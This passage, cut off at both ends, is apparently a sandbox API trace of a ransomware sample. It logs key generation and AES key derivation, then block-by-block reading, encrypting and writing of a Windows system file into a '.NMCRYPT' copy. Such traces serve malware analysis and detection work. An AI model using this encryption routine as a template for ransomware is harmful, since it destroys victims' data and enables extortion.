pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.202] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0168.203] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0168.203] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0168.203] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.203] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad438) returned 1 [0168.203] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0168.203] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0168.203] wcslen (_String="\\\\?\\") returned 0x4 [0168.203] CryptDuplicateKey (in: hKey=0x9ad438, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad2f8) returned 1 [0168.203] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0168.204] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0168.204] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=25088) returned 1 [0168.204] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0168.204] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.206] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.206] GetLastError () returned 0x0 [0168.206] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.207] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.207] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.207] GetLastError () returned 0x0 [0168.207] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.207] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.207] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.207] GetLastError () returned 0x0 [0168.207] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.207] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.207] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.207] GetLastError () returned 0x0 [0168.207] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.207] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.207] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.208] GetLastError () returned 0x0 [0168.208] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.208] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.208] CryptEncrypt (in: hKey=0x9ad2f8, 